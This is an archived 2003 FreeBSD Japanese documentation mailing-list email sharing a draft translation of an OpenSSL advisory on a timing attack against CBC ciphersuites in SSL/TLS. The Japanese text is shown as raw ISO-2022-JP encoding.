From owner-doc-jp-work@jp.FreeBSD.org Sun Feb 23 18:10:16 2003
Received: (from daemon@localhost)
	by castle.jp.FreeBSD.org (8.11.6+3.4W/8.11.3) id h1N9AG853293;
	Sun, 23 Feb 2003 18:10:16 +0900 (JST)
	(envelope-from owner-doc-jp-work@jp.FreeBSD.org)
Received: from smtp.eos.ocn.ne.jp (eos.ocn.ne.jp [211.6.83.117])
	by castle.jp.FreeBSD.org (8.11.6+3.4W/8.11.3) with ESMTP/inet id h1N9AGi53288
	for <doc-jp-work@jp.FreeBSD.org>; Sun, 23 Feb 2003 18:10:16 +0900 (JST)
	(envelope-from hrs@eos.ocn.ne.jp)
Received: from mail.allbsd.org (p30156-adsao12honb4-acca.tokyo.ocn.ne.jp [219.161.183.156])
	by smtp.eos.ocn.ne.jp (Postfix) with ESMTP id 99E4E3808
	for <doc-jp-work@jp.FreeBSD.org>; Sun, 23 Feb 2003 18:10:15 +0900 (JST)
Received: from localhost (alph.allbsd.org [192.168.0.10])
	by mail.allbsd.org (8.12.6/3.7W/DomainMaster) with ESMTP id h1N99PJ8094672
	for <doc-jp-work@jp.FreeBSD.org>; Sun, 23 Feb 2003 18:09:26 +0900 (JST)
	(envelope-from hrs@eos.ocn.ne.jp)
Message-Id: <20030223.180916.71084227.hrs@eos.ocn.ne.jp>
To: doc-jp-work@jp.FreeBSD.org
From: Hiroki Sato <hrs@eos.ocn.ne.jp>
X-PGPkey-fingerprint: BDB3 443F A5DD B3D0 A530  FFD7 4F2C D3D8 2793 CF2D
X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit
Reply-To: doc-jp-work@jp.FreeBSD.org
Precedence: list
Date: Sun, 23 Feb 2003 18:09:16 +0900
X-Sequence: doc-jp-work 595
Subject: [doc-jp-work 595] OpenSSL advisory
Errors-To: owner-doc-jp-work@jp.FreeBSD.org
Sender: owner-doc-jp-work@jp.FreeBSD.org
X-Originator: hrs@eos.ocn.ne.jp
X-Distribute: distribute version 2.1 (Alpha) patchlevel 24e+030107

$B:4F#!wEl5~M}2JBg3X$G$9!#(B

 $B$^$b$J$/(B OpenSSL $B4XO"$N4+9p$,=P$k$N$G$9$,!"(B
 $BK]Lu$NCY$l$r$J$k$Y$/>.$5$/$7$h$&1?F0$rE83+Cf$J$N$G!"(B
 $B>pJs8;$G$"$k(B

  http://www.openssl.org/news/secadv_20030219.txt

 $B$N35MW@bL@ItJ,$@$1@h$K=P$7$F$*$-$^$9!#(B
 $BJQ$JItJ,$,$"$C$?$i;XE&$/$@$5$$!#(B

----($B$3$3$+$i(B)

Vulnerability
-------------

In an upcoming paper, Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge
Vaudenay (EPFL), and Martin Vuagnoux (EPFL, Ilion) describe and
demonstrate a timing-based attack on CBC ciphersuites in SSL and TLS.

  Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge Vaudenay (EPFL),
  Martin Vuagnoux (EPFL, Ilion) $B$i$O!"$^$b$J$/8x3+$5$l$kO@J8$G(B
  SSL $B$H(B TLS $B$K4^$^$l$k(B CBC $B0E9f$KBP$9$k%?%$%_%s%0%Y!<%9967bJ}K!$N(B
  $B@bL@$HN)>Z$r9T$J$C$F$$$^$9!#(B

The attack assumes that multiple SSL or TLS connections involve a
common fixed plaintext block, such as a password.  An active attacker
can substitute specifically made-up ciphertext blocks for blocks sent
by legitimate SSL/TLS parties and measure the time until a response
arrives: SSL/TLS includes data authentication to ensure that such
modified ciphertext blocks will be rejected by the peer (and the
connection aborted), but the attacker may be able to use timing
observations to distinguish between two different error cases, namely
block cipher padding errors and MAC verification errors.  This is
sufficient for an adaptive attack that finally can obtain the complete
plaintext block.

  $B$3$N967b$O!"J#?t$N(B SSL $B$b$7$/$O(B TLS $B$N@\B3$K$*$$$F!"%Q%9%o!<%I$J$I(B
  $BFbMF$,8GDj$NJ?J8%V%m%C%/$,6&DL$G;H$o$l$k$3$H$rA0Ds$H$7$?$b$N$G$9!#(B
  $B967b$r3+;O$9$kB&$+$i$O!"@55,$N(B SSL/TLS $BAw?.<T$,Aw?.$7$?%V%m%C%/$rAu$C$F(B
  $BFCJL$K:n@.$7$?0E9fJ8%V%m%C%/$rAw$j!"H?1~$,E~Ce$9$k$^$G$N;~4V$r7WB,$9$k$3$H$,(B
  $B2DG=$G$9!#(BSSL/TLS $B$K$O!"$=$N$h$&$K2~$6$s$5$l$?0E9fJ8%V%m%C%/$,<u?.B&$G(B
  $B@5$7$/GK4~$5$l$k(B ($B$=$7$F@\B3$r@ZCG$9$k(B) $B$h$&!"%G!<%?G'>Z$,(B
  $B4^$^$l$F$$$k$N$G$9$,!"967b<T$O$=$NH?1~;~4V$N7WB,7k2L$+$i!"(B
  $B!V2?$,860x$G%V%m%C%/$,GK4~$5$l$?$N$+!W$H$$$&!"$=$N:]$K9M$($i$l$k(B
  2 $B<oN`$N%1!<%9!"$D$^$j!V%V%m%C%/0E9f$N%Q%G%#%s%0%(%i!<(B (block cipher
  padding error)$B!W$J$N$+!"!V(BMAC $B8!>Z%(%i!<(B (MAC verification error)$B!W$J$N$+$r(B
  $B6hJL$9$k$3$H$,$G$-$k2DG=@-$,$"$j$^$9!#$3$N;v<B$O!"40A4$JJ?J8%V%m%C%/$r(B
  $B3MF@$G$-$k!"$"$k<o$NE,1~967b$r9T$J$&>e$G==J,$J>pJs8;$K$J$j$^$9!#(B

--
| $B:4F#(B $B9-@8!wEl5~M}2JBg3X(B <hrs@eos.ocn.ne.jp>
|                         <hrs@FreeBSD.org> (FreeBSD Project)
